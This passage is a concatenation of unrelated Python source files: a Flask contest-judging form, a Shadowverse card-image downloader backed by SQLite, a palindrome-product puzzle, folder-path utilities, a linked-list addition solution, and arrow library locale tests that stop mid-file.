label, validators=[wtfv.Length(max=10000)])
def _question_field(number):
return wtforms.RadioField(
'Question {}'.format(number),
choices=[
('1', 'Unsatisfactory'),
('2', 'Improvement Needed'),
('3', 'Meets Expectations'),
('4', 'Exceeds Expectations')
]
)
question1 = _question_field('1')
question1_comment = _comment_field()
question2 = _question_field('2')
question2_comment = _comment_field()
question3 = _question_field('3')
question3_comment = _comment_field()
question4 = _question_field('4')
question4_comment = _comment_field()
question5 = _question_field('5')
question5_comment = _comment_field()
question6 = _question_field('6')
question6_comment = _comment_field()
general_comment = _comment_field('General Comments')
def execute(self, contestant):
"""Saves scores for questions."""
contest = contestant.get_contest()
if self.is_submitted():
if self.validate():
self._save_scores(contestant)
flask.flash('Thank you for scoring contestant {}.'.format(
contestant.display_name))
return flask.redirect(
contest.format_uri('judging'))
else:
self._load_scores(contestant)
return contest.task_class.get_template().render_template(
contest,
'judge-contestant',
sub_base_template=contest.task_class.get_template().base_template('detail'),
contestant=contestant,
form=self
)
@classmethod
def get_points_for_question(cls, number):
return pcm.JudgeScore.get_points_for_question(number)
@classmethod
def get_text_for_question(cls, number):
return pcm.JudgeScore.get_text_for_question(number)
def validate(self):
"""Clear any errors for unselected radio choices."""
super(Judgement, self).validate()
for num in range(1, 7):
self['question{}'.format(num)].errors = None
common.log_form_errors(self)
return not self.errors
def _load_scores(self, contestant):
"""Load scores from database."""
for num in range(1, 7):
score = self._unsafe_get_score(contestant, num)
if not score:
continue
self['question{}'.format(num)].data = str(score.judge_score)
self['question{}_comment'.format(num)].data = score.judge_comment
question0 = self._unsafe_get_score(contestant, 0)
        if question0:
self.general_comment.data = question0.judge_comment
def _save_score(self, contestant, num, val, comment):
"""Save a question score to database."""
score = self._unsafe_get_score(contestant, num)
if not score:
score = pcm.JudgeScore()
score.judge_biv_id = flask.session['user.biv_id']
score.contestant_biv_id = contestant.biv_id
score.question_number = int(num)
score.judge_score = int(val)
score.judge_comment = comment
ppc.db.session.add(score)
def _save_scores(self, contestant):
"""Saves scores to database."""
for num in range(1, 7):
val = self['question{}'.format(num)].data
# TODO(pjm): hack - val may have been coerced to string "None"
if val is None or val == 'None':
val = 0
self._save_score(contestant, num, val,
str(self['question{}_comment'.format(num)].data))
self._save_score(contestant, 0, 0, str(self.general_comment.data))
def _unsafe_get_score(self, contestant, num):
"""Loads a question score from database."""
return pcm.JudgeScore.query.filter_by(
judge_biv_id=flask.session['user.biv_id'],
contestant_biv_id=contestant.biv_id,
question_number=int(num)
).first()
|
nilq/baby-python
|
python
|
import sqlite3
import os
import urllib.request
from urllib.error import *
DATABASE_PATH = 'database/card_image_database.db'
def create_card_image_database(print_function):
print_function('Creating Database.')
if os.path.exists(DATABASE_PATH):
try:
os.remove(DATABASE_PATH)
except OSError as e:
print('Error while deleting file', DATABASE_PATH)
print(e)
conn = sqlite3.connect(DATABASE_PATH)
c = conn.cursor()
print_function('Creating Table.')
c.execute("""CREATE TABLE cards (
card_id integer,
card_image blob
)""")
conn.commit()
print_function('Retrieving Card IDs.')
conn_card = sqlite3.connect('database/card_database.db')
conn_card.row_factory = lambda cursor, row: row[0]
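    # The row_factory unwraps each single-column row, so fetchall() returns
    # a flat list of card ids instead of a list of 1-tuples.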
c_card = conn_card.cursor()
card_ids = c_card.execute('SELECT card_id FROM cards').fetchall()
num_of_cards = len(card_ids)
print_function('Inserting Card Images.')
for index, card_id in enumerate(card_ids):
try:
card_image_url = "https://shadowverse-portal.com/image/card/phase2/common/L/L_" + str(card_id) + ".jpg"
with urllib.request.urlopen(card_image_url) as response:
data = response.read()
insert_card_image(card_id, data, conn, c)
except TimeoutError:
print_function('Downloading image failed. Update database to try again.')
return
except URLError:
print_function('Unable to reach website. Please check internet connection.')
return
print_function('Inserted ' + str(index + 1) + ' out of ' + str(num_of_cards) + ' images.')
print_function('Completed')
conn.close()
def update_card_image_database(print_function):
if not os.path.exists(DATABASE_PATH):
create_card_image_database(print_function)
return
print_function('Accessing Database.')
conn = sqlite3.connect(DATABASE_PATH)
conn.row_factory = lambda cursor, row: row[0]
c = conn.cursor()
image_card_ids = c.execute('SELECT card_id FROM cards').fetchall()
print_function('Retrieving Card IDs.')
conn_card = sqlite3.connect('database/card_database.db')
conn_card.row_factory = lambda cursor, row: row[0]
c_card = conn_card.cursor()
card_card_ids = c_card.execute('SELECT card_id FROM cards').fetchall()
num_of_cards = len(card_card_ids)
print_function('Inserting Card Images.')
for index, card_id in enumerate(card_card_ids):
if card_id not in image_card_ids:
try:
card_image_url = "https://shadowverse-portal.com/image/card/phase2/common/L/L_" + str(card_id) + ".jpg"
with urllib.request.urlopen(card_image_url) as response:
data = response.read()
insert_card_image(card_id, data, conn, c)
except TimeoutError:
print_function('Downloading image failed. Update database to try again.')
return
except URLError:
print_function('Unable to reach website. Please check internet connection.')
return
print_function('Inserted ' + str(index + 1) + ' out of ' + str(num_of_cards) + ' images.')
print_function('Completed')
conn.close()
def insert_card_image(card_id_number, card_image, conn, cursor):
with conn:
cursor.execute("""INSERT INTO cards VALUES (
:card_id,
:card_image
)""",
{
'card_id': card_id_number,
'card_image': card_image
})
|
nilq/baby-python
|
python
|
'''
Largest Palindrome of two N-digit numbers given
N = 1, 2, 3, 4
'''
def largest_palindrome(n_digits):
    """
    Return (i, j, i * j) where i * j is the largest palindrome that is a
    product of two n_digits-digit numbers. A running maximum is tracked
    explicitly, because palindromes are not encountered in decreasing
    product order during the scan, so returning the first one found would
    not necessarily give the largest.
    """
    lo = 10 ** (n_digits - 1)
    hi = 10 ** n_digits - 1
    answer = 0
    pair = None
    for i in range(hi, lo - 1, -1):
        if i * i <= answer:
            break  # i * i is the largest product left, so nothing can improve
        for j in range(i, lo - 1, -1):
            k = i * j
            if k <= answer:
                break  # j only decreases, so k only shrinks from here
            s = str(k)
            if s == s[::-1]:
                answer = k
                pair = (i, j, k)
    return pair
print(largest_palindrome(3))  # (993, 913, 906609)
print(largest_palindrome(2))  # (99, 91, 9009)
print(largest_palindrome(1))  # (9, 1, 9)
print(largest_palindrome(4))  # (9999, 9901, 99000099)
|
nilq/baby-python
|
python
|
import os
import tempfile
from os import makedirs
from os.path import join, exists
from sys import platform
def get_home_folder():
from pathlib import Path
home_folder = f"{Path.home()}"
return home_folder
def get_temp_folder():
    # tempfile.gettempdir() already handles linux, darwin and win32
    temp_folder = tempfile.gettempdir()
    try:
        makedirs(temp_folder)
    except Exception:
        pass
    if exists(temp_folder):
        return temp_folder
    else:
        return None
def get_cache_folder():
    cache_folder = None
    if platform == "linux" or platform == "linux2":
        cache_folder = join(get_home_folder(), '.cache')
    elif platform == "darwin":
        # join() discards the first component when the second is absolute,
        # so the macOS path must be relative to the home folder
        cache_folder = join(get_home_folder(), 'Library/Caches')
    elif platform == "win32":
        # %LOCALAPPDATA% is already an absolute path
        cache_folder = os.getenv('LOCALAPPDATA')
    try:
        makedirs(cache_folder)
    except Exception:
        pass
    if cache_folder is not None and exists(cache_folder):
        return cache_folder
    else:
        return None
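# Quick demonstration of the helpers above (safe to run: it only creates the
# directories these functions are meant to guarantee):
if __name__ == "__main__":
    print("home :", get_home_folder())
    print("temp :", get_temp_folder())
    print("cache:", get_cache_folder())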
|
nilq/baby-python
|
python
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
    def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
        # Recursive digit-by-digit addition with carry; the helper is named
        # differently from the method to avoid shadowing it.
        def add_nodes(list1, list2, node, carry):
            n = carry
            if list1 is not None:
                n += list1.val
            if list2 is not None:
                n += list2.val
            carry_out, digit = divmod(n, 10)
            node.val = digit
            node.next = None
            next_list1 = list1.next if list1 is not None else None
            next_list2 = list2.next if list2 is not None else None
            # stop when both inputs are exhausted and no carry remains
            if next_list1 is None and next_list2 is None and carry_out == 0:
                return
            node.next = ListNode(0)
            add_nodes(next_list1, next_list2, node.next, carry_out)
        startNode = ListNode(0)
        add_nodes(l1, l2, startNode, 0)
        return startNode
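# Self-test sketch; ListNode is normally provided by the LeetCode judge, so it
# is defined here only for local experimentation:
# class ListNode:
#     def __init__(self, val=0, next=None):
#         self.val, self.next = val, next
#
# def build(digits):  # digits in reverse order, e.g. 342 -> [2, 4, 3]
#     head = ListNode(digits[0])
#     node = head
#     for d in digits[1:]:
#         node.next = ListNode(d)
#         node = node.next
#     return head
#
# # 342 + 465 = 807, i.e. the result list reads 7 -> 0 -> 8:
# # Solution().addTwoNumbers(build([2, 4, 3]), build([5, 6, 4]))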
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from chai import Chai
from arrow import arrow, locales
class ModuleTests(Chai):
def test_get_locale(self):
mock_locales = self.mock(locales, "_locales")
mock_locale_cls = self.mock()
mock_locale = self.mock()
self.expect(mock_locales.get).args("name").returns(mock_locale_cls)
self.expect(mock_locale_cls).returns(mock_locale)
result = locales.get_locale("name")
self.assertEqual(result, mock_locale)
def test_locales(self):
self.assertTrue(len(locales._locales) > 0)
class LocaleTests(Chai):
def setUp(self):
super(LocaleTests, self).setUp()
self.locale = locales.EnglishLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hours")
self.assertEqual(self.locale._format_timeframe("hour", 0), "an hour")
def test_format_relative_now(self):
result = self.locale._format_relative("just now", "now", 0)
self.assertEqual(result, "just now")
def test_format_relative_past(self):
result = self.locale._format_relative("an hour", "hour", 1)
self.assertEqual(result, "in an hour")
def test_format_relative_future(self):
result = self.locale._format_relative("an hour", "hour", -1)
self.assertEqual(result, "an hour ago")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(0), "0th")
self.assertEqual(self.locale.ordinal_number(1), "1st")
self.assertEqual(self.locale.ordinal_number(2), "2nd")
self.assertEqual(self.locale.ordinal_number(3), "3rd")
self.assertEqual(self.locale.ordinal_number(4), "4th")
self.assertEqual(self.locale.ordinal_number(10), "10th")
self.assertEqual(self.locale.ordinal_number(11), "11th")
self.assertEqual(self.locale.ordinal_number(12), "12th")
self.assertEqual(self.locale.ordinal_number(13), "13th")
self.assertEqual(self.locale.ordinal_number(14), "14th")
self.assertEqual(self.locale.ordinal_number(21), "21st")
self.assertEqual(self.locale.ordinal_number(22), "22nd")
self.assertEqual(self.locale.ordinal_number(23), "23rd")
self.assertEqual(self.locale.ordinal_number(24), "24th")
self.assertEqual(self.locale.ordinal_number(100), "100th")
self.assertEqual(self.locale.ordinal_number(101), "101st")
self.assertEqual(self.locale.ordinal_number(102), "102nd")
self.assertEqual(self.locale.ordinal_number(103), "103rd")
self.assertEqual(self.locale.ordinal_number(104), "104th")
self.assertEqual(self.locale.ordinal_number(110), "110th")
self.assertEqual(self.locale.ordinal_number(111), "111th")
self.assertEqual(self.locale.ordinal_number(112), "112th")
self.assertEqual(self.locale.ordinal_number(113), "113th")
self.assertEqual(self.locale.ordinal_number(114), "114th")
self.assertEqual(self.locale.ordinal_number(121), "121st")
self.assertEqual(self.locale.ordinal_number(122), "122nd")
self.assertEqual(self.locale.ordinal_number(123), "123rd")
self.assertEqual(self.locale.ordinal_number(124), "124th")
def test_meridian_invalid_token(self):
self.assertEqual(self.locale.meridian(7, None), None)
self.assertEqual(self.locale.meridian(7, "B"), None)
self.assertEqual(self.locale.meridian(7, "NONSENSE"), None)
class EnglishLocaleTests(Chai):
def setUp(self):
super(EnglishLocaleTests, self).setUp()
self.locale = locales.EnglishLocale()
def test_describe(self):
self.assertEqual(self.locale.describe("now", only_distance=True), "instantly")
self.assertEqual(self.locale.describe("now", only_distance=False), "just now")
class ItalianLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.ItalianLocale()
self.assertEqual(locale.ordinal_number(1), "1º")
class SpanishLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.SpanishLocale()
self.assertEqual(locale.ordinal_number(1), "1º")
class FrenchLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.FrenchLocale()
self.assertEqual(locale.ordinal_number(1), "1er")
self.assertEqual(locale.ordinal_number(2), "2e")
class RussianLocalesTests(Chai):
def test_plurals2(self):
locale = locales.RussianLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 часов")
self.assertEqual(locale._format_timeframe("hours", 1), "1 час")
self.assertEqual(locale._format_timeframe("hours", 2), "2 часа")
self.assertEqual(locale._format_timeframe("hours", 4), "4 часа")
self.assertEqual(locale._format_timeframe("hours", 5), "5 часов")
self.assertEqual(locale._format_timeframe("hours", 21), "21 час")
self.assertEqual(locale._format_timeframe("hours", 22), "22 часа")
self.assertEqual(locale._format_timeframe("hours", 25), "25 часов")
# feminine grammatical gender should be tested separately
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минут")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минуту")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минуты")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минуты")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минут")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минуту")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минуты")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минут")
class PolishLocalesTests(Chai):
def test_plurals(self):
locale = locales.PolishLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 godzin")
self.assertEqual(locale._format_timeframe("hours", 1), "1 godzin")
self.assertEqual(locale._format_timeframe("hours", 2), "2 godziny")
self.assertEqual(locale._format_timeframe("hours", 4), "4 godziny")
self.assertEqual(locale._format_timeframe("hours", 5), "5 godzin")
self.assertEqual(locale._format_timeframe("hours", 21), "21 godzin")
self.assertEqual(locale._format_timeframe("hours", 22), "22 godziny")
self.assertEqual(locale._format_timeframe("hours", 25), "25 godzin")
class IcelandicLocalesTests(Chai):
def setUp(self):
super(IcelandicLocalesTests, self).setUp()
self.locale = locales.IcelandicLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("minute", -1), "einni mínútu")
self.assertEqual(self.locale._format_timeframe("minute", 1), "eina mínútu")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 tímum")
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 tíma")
self.assertEqual(self.locale._format_timeframe("now", 0), "rétt í þessu")
class MalayalamLocaleTests(Chai):
def setUp(self):
super(MalayalamLocaleTests, self).setUp()
self.locale = locales.MalayalamLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 മണിക്കൂർ")
self.assertEqual(self.locale._format_timeframe("hour", 0), "ഒരു മണിക്കൂർ")
def test_format_relative_now(self):
result = self.locale._format_relative("ഇപ്പോൾ", "now", 0)
self.assertEqual(result, "ഇപ്പോൾ")
def test_format_relative_past(self):
result = self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", 1)
self.assertEqual(result, "ഒരു മണിക്കൂർ ശേഷം")
def test_format_relative_future(self):
result = self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", -1)
self.assertEqual(result, "ഒരു മണിക്കൂർ മുമ്പ്")
class HindiLocaleTests(Chai):
def setUp(self):
super(HindiLocaleTests, self).setUp()
self.locale = locales.HindiLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 घंटे")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घंटा")
def test_format_relative_now(self):
result = self.locale._format_relative("अभी", "now", 0)
self.assertEqual(result, "अभी")
def test_format_relative_past(self):
result = self.locale._format_relative("एक घंटा", "hour", 1)
self.assertEqual(result, "एक घंटा बाद")
def test_format_relative_future(self):
result = self.locale._format_relative("एक घंटा", "hour", -1)
self.assertEqual(result, "एक घंटा पहले")
class CzechLocaleTests(Chai):
def setUp(self):
super(CzechLocaleTests, self).setUp()
self.locale = locales.CzechLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hodiny")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 hodin")
self.assertEqual(self.locale._format_timeframe("hour", 0), "0 hodin")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 hodinami")
self.assertEqual(self.locale._format_timeframe("hours", -5), "5 hodinami")
self.assertEqual(self.locale._format_timeframe("now", 0), "Teď")
def test_format_relative_now(self):
result = self.locale._format_relative("Teď", "now", 0)
self.assertEqual(result, "Teď")
def test_format_relative_future(self):
result = self.locale._format_relative("hodinu", "hour", 1)
self.assertEqual(result, "Za hodinu")
def test_format_relative_past(self):
result = self.locale._format_relative("hodinou", "hour", -1)
self.assertEqual(result, "Před hodinou")
class SlovakLocaleTests(Chai):
def setUp(self):
super(SlovakLocaleTests, self).setUp()
self.locale = locales.SlovakLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hodiny")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 hodín")
self.assertEqual(self.locale._format_timeframe("hour", 0), "0 hodín")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 hodinami")
self.assertEqual(self.locale._format_timeframe("hours", -5), "5 hodinami")
self.assertEqual(self.locale._format_timeframe("now", 0), "Teraz")
def test_format_relative_now(self):
result = self.locale._format_relative("Teraz", "now", 0)
self.assertEqual(result, "Teraz")
def test_format_relative_future(self):
result = self.locale._format_relative("hodinu", "hour", 1)
self.assertEqual(result, "O hodinu")
def test_format_relative_past(self):
result = self.locale._format_relative("hodinou", "hour", -1)
self.assertEqual(result, "Pred hodinou")
class BulgarianLocaleTests(Chai):
def test_plurals2(self):
locale = locales.BulgarianLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 часа")
self.assertEqual(locale._format_timeframe("hours", 1), "1 час")
self.assertEqual(locale._format_timeframe("hours", 2), "2 часа")
self.assertEqual(locale._format_timeframe("hours", 4), "4 часа")
self.assertEqual(locale._format_timeframe("hours", 5), "5 часа")
self.assertEqual(locale._format_timeframe("hours", 21), "21 час")
self.assertEqual(locale._format_timeframe("hours", 22), "22 часа")
self.assertEqual(locale._format_timeframe("hours", 25), "25 часа")
# feminine grammatical gender should be tested separately
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минути")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минута")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минути")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минути")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минути")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минута")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минути")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минути")
class MacedonianLocaleTests(Chai):
def test_plurals_mk(self):
locale = locales.MacedonianLocale()
# time
self.assertEqual(locale._format_relative("сега", "now", 0), "сега")
# Hours
self.assertEqual(locale._format_timeframe("hours", 0), "0 саати")
self.assertEqual(locale._format_timeframe("hours", 1), "1 саат")
self.assertEqual(locale._format_timeframe("hours", 2), "2 саати")
self.assertEqual(locale._format_timeframe("hours", 4), "4 саати")
self.assertEqual(locale._format_timeframe("hours", 5), "5 саати")
self.assertEqual(locale._format_timeframe("hours", 21), "21 саат")
self.assertEqual(locale._format_timeframe("hours", 22), "22 саати")
self.assertEqual(locale._format_timeframe("hours", 25), "25 саати")
# Minutes
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минути")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минута")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минути")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минути")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минути")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минута")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минути")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минути")
class HebrewLocaleTests(Chai):
def test_couple_of_timeframe(self):
locale = locales.HebrewLocale()
self.assertEqual(locale._format_timeframe("hours", 2), "שעתיים")
self.assertEqual(locale._format_timeframe("months", 2), "חודשיים")
self.assertEqual(locale._format_timeframe("days", 2), "יומיים")
self.assertEqual(locale._format_timeframe("years", 2), "שנתיים")
self.assertEqual(locale._format_timeframe("hours", 3), "3 שעות")
self.assertEqual(locale._format_timeframe("months", 4), "4 חודשים")
self.assertEqual(locale._format_timeframe("days", 3), "3 ימים")
self.assertEqual(locale._format_timeframe("years", 5), "5 שנים")
class MarathiLocaleTests(Chai):
def setUp(self):
super(MarathiLocaleTests, self).setUp()
self.locale = locales.MarathiLocale()
def test_dateCoreFunctionality(self):
dt = arrow.Arrow(2015, 4, 11, 17, 30, 00)
self.assertEqual(self.locale.month_name(dt.month), "एप्रिल")
self.assertEqual(self.locale.month_abbreviation(dt.month), "एप्रि")
self.assertEqual(self.locale.day_name(dt.isoweekday()), "शनिवार")
self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "शनि")
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 तास")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक तास")
def test_format_relative_now(self):
result = self.locale._format_relative("सद्य", "now", 0)
self.assertEqual(result, "सद्य")
def test_format_relative_past(self):
result = self.locale._format_relative("एक तास", "hour", 1)
self.assertEqual(result, "एक तास नंतर")
def test_format_relative_future(self):
result = self.locale._format_relative("एक तास", "hour", -1)
self.assertEqual(result, "एक तास आधी")
# Not currently implemented
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1")
class FinnishLocaleTests(Chai):
def setUp(self):
super(FinnishLocaleTests, self).setUp()
self.locale = locales.FinnishLocale()
def test_format_timeframe(self):
self.assertEqual(
self.locale._format_timeframe("hours", 2), ("2 tuntia", "2 tunnin")
)
self.assertEqual(self.locale._format_timeframe("hour", 0), ("tunti", "tunnin"))
def test_format_relative_now(self):
result = self.locale._format_relative(["juuri nyt", "juuri nyt"], "now", 0)
self.assertEqual(result, "juuri nyt")
def test_format_relative_past(self):
result = self.locale._format_relative(["tunti", "tunnin"], "hour", 1)
self.assertEqual(result, "tunnin kuluttua")
def test_format_relative_future(self):
result = self.locale._format_relative(["tunti", "tunnin"], "hour", -1)
self.assertEqual(result, "tunti sitten")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1.")
class GermanLocaleTests(Chai):
def setUp(self):
super(GermanLocaleTests, self).setUp()
self.locale = locales.GermanLocale()
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1.")
def test_define(self):
self.assertEqual(
self.locale.describe("minute", only_distance=True), "eine Minute"
)
self.assertEqual(
self.locale.describe("minute", only_distance=False), "in einer Minute"
)
self.assertEqual(
self.locale.describe("hour", only_distance=True), "eine Stunde"
)
self.assertEqual(
self.locale.describe("hour", only_distance=False), "in einer Stunde"
)
self.assertEqual(self.locale.describe("day", only_distance=True), "ein Tag")
self.assertEqual(
self.locale.describe("day", only_distance=False), "in einem Tag"
)
self.assertEqual(self.locale.describe("month", only_distance=True), "ein Monat")
self.assertEqual(
self.locale.describe("month", only_distance=False), "in einem Monat"
)
self.assertEqual(self.locale.describe("year", only_distance=True), "ein Jahr")
self.assertEqual(
self.locale.describe("year", only_distance=False), "in einem Jahr"
)
class HungarianLocaleTests(Chai):
def setUp(self):
super(HungarianLocaleTests, self).setUp()
self.locale = locales.HungarianLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 óra")
self.assertEqual(self.locale._format_timeframe("hour", 0), "egy órával")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 órával")
self.assertEqual(self.locale._format_timeframe("now", 0), "éppen most")
class EsperantoLocaleTests(Chai):
def setUp(self):
super(EsperantoLocaleTests, self).setUp()
self.locale = locales.EsperantoLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 horoj")
self.assertEqual(self.locale._format_timeframe("hour", 0), "un horo")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 horoj")
self.assertEqual(self.locale._format_timeframe("now", 0), "nun")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1a")
class ThaiLocaleTests(Chai):
def setUp(self):
super(ThaiLocaleTests, self).setUp()
self.locale = locales.ThaiLocale()
def test_year_full(self):
self.assertEqual(self.locale.year_full(2015), "2558")
def test_year_abbreviation(self):
self.assertEqual(self.locale.year_abbreviation(2015), "58")
def test_format_relative_now(self):
result = self.locale._format_relative("ขณะนี้", "now", 0)
self.assertEqual(result, "ขณะนี้")
def test_format_relative_past(self):
result = self.locale._format_relative("1 ชั่วโมง", "hour", 1)
self.assertEqual(result, "ในอีก 1 ชั่วโมง")
result = self.locale._format_relative("{0} ชั่วโมง", "hours", 2)
self.assertEqual(result, "ในอีก {0} ชั่วโมง")
result = self.locale._format_relative("ไม่กี่วินาที", "seconds", 42)
self.assertEqual(result, "ในอีกไม่กี่วินาที")
def test_format_relative_future(self):
result = self.locale._format_relative("1 ชั่วโมง", "hour", -1)
self.assertEqual(result, "1 ชั่วโมง ที่ผ่านมา")
class BengaliLocaleTests(Chai):
def setUp(self):
super(BengaliLocaleTests, self).setUp()
self.locale = locales.BengaliLocale()
def test_ordinal_number(self):
result0 = self.locale._ordinal_number(0)
result1 = self.locale._ordinal_number(1)
result3 = self.locale._ordinal_number(3)
result4 = self.locale._ordinal_number(4)
result5 = self.locale._ordinal_number(5)
result6 = self.locale._ordinal_number(6)
result10 = self.locale._ordinal_number(10)
result11 = self.locale._ordinal_number(11)
result42 = self.locale._ordinal_number(42)
self.assertEqual(result0, "0তম")
self.assertEqual(result1, "1ম")
self.assertEqual(result3, "3য়")
self.assertEqual(result4, "4র্থ")
self.assertEqual(result5, "5ম")
self.assertEqual(result6, "6ষ্ঠ")
self.assertEqual(result10, "10ম")
self.assertEqual(result11, "11তম")
self.assertEqual(result42, "42তম")
self.assertEqual(self.locale._ordinal_number(-1), None)
class SwissLocaleTests(Chai):
def setUp(self):
super(SwissLocaleTests, self).setUp()
self.locale = locales.SwissLocale()
def test_ordinal_number(self):
dt = arrow.Arrow(2015, 4, 11, 17, 30, 00)
self.assertEqual(self.locale._format_timeframe("minute", 1), "einer Minute")
self.assertEqual(self.locale._format_timeframe("hour", 1), "einer Stunde")
self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "Sa")
class RomanianLocaleTests(Chai):
def setUp(self):
super(RomanianLocaleTests, self).setUp()
self.locale = locales.RomanianLocale()
def test_timeframes(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 ore")
self.assertEqual(self.locale._format_timeframe("months", 2), "2 luni")
self.assertEqual(self.locale._format_timeframe("days", 2), "2 zile")
self.assertEqual(self.locale._format_timeframe("years", 2), "2 ani")
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 ore")
self.assertEqual(self.locale._format_timeframe("months", 4), "4 luni")
self.assertEqual(self.locale._format_timeframe("days", 3), "3 zile")
self.assertEqual(self.locale._format_timeframe("years", 5), "5 ani")
def test_relative_timeframes(self):
self.assertEqual(self.locale._format_relative("acum", "now", 0), "acum")
self.assertEqual(
self.locale._format_relative("o oră", "hour", 1), "peste o oră"
)
self.assertEqual(
self.locale._format_relative("o oră", "hour", -1), "o oră în urmă"
)
self.assertEqual(
self.locale._format_relative("un minut", "minute", 1), "peste un minut"
)
self.assertEqual(
self.locale._format_relative("un minut", "minute", -1), "un minut în urmă"
)
self.assertEqual(
self.locale._format_relative("câteva secunde", "seconds", -1),
"câteva secunde în urmă",
)
self.assertEqual(
self.locale._format_relative("câteva secunde", "seconds", 1),
"peste câteva secunde",
)
self.assertEqual(
self.locale._format_relative("o zi", "day", -1), "o zi în urmă"
)
self.assertEqual(self.locale._format_relative("o zi", "day", 1), "peste o zi")
class ArabicLocalesTest(Chai):
def setUp(self):
super(ArabicLocalesTest, self).setUp()
self.locale = locales.ArabicLocale()
def test_timeframes(self):
# single
self.assertEqual(self.locale._format_timeframe("minute", 1), "دقيقة")
self.assertEqual(self.locale._format_timeframe("hour", 1), "ساعة")
self.assertEqual(self.locale._format_timeframe("day", 1), "يوم")
self.assertEqual(self.locale._format_timeframe("month", 1), "شهر")
self.assertEqual(self.locale._format_timeframe("year", 1), "سنة")
# double
self.assertEqual(self.locale._format_timeframe("minutes", 2), "دقيقتين")
self.assertEqual(self.locale._format_timeframe("hours", 2), "ساعتين")
self.assertEqual(self.locale._format_timeframe("days", 2), "يومين")
self.assertEqual(self.locale._format_timeframe("months", 2), "شهرين")
self.assertEqual(self.locale._format_timeframe("years", 2), "سنتين")
# up to ten
self.assertEqual(self.locale._format_timeframe("minutes", 3), "3 دقائق")
self.assertEqual(self.locale._format_timeframe("hours", 4), "4 ساعات")
self.assertEqual(self.locale._format_timeframe("days", 5), "5 أيام")
self.assertEqual(self.locale._format_timeframe("months", 6), "6 أشهر")
self.assertEqual(self.locale._format_timeframe("years", 10), "10 سنوات")
# more than ten
self.assertEqual(self.locale._format_timeframe("minutes", 11), "11 دقيقة")
self.assertEqual(self.locale._format_timeframe("hours", 19), "19 ساعة")
self.assertEqual(self.locale._format_timeframe("months", 24), "24 شهر")
self.assertEqual(self.locale._format_timeframe("days", 50), "50 يوم")
self.assertEqual(self.locale._format_timeframe("years", 115), "115 سنة")
class NepaliLocaleTests(Chai):
def setUp(self):
super(NepaliLocaleTests, self).setUp()
self.locale = locales.NepaliLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 घण्टा")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घण्टा")
def test_format_relative_now(self):
result = self.locale._format_relative("अहिले", "now", 0)
self.assertEqual(result, "अहिले")
def test_format_relative_future(self):
result = self.locale._format_relative("एक घण्टा", "hour", 1)
self.assertEqual(result, "एक घण्टा पछी")
def test_format_relative_past(self):
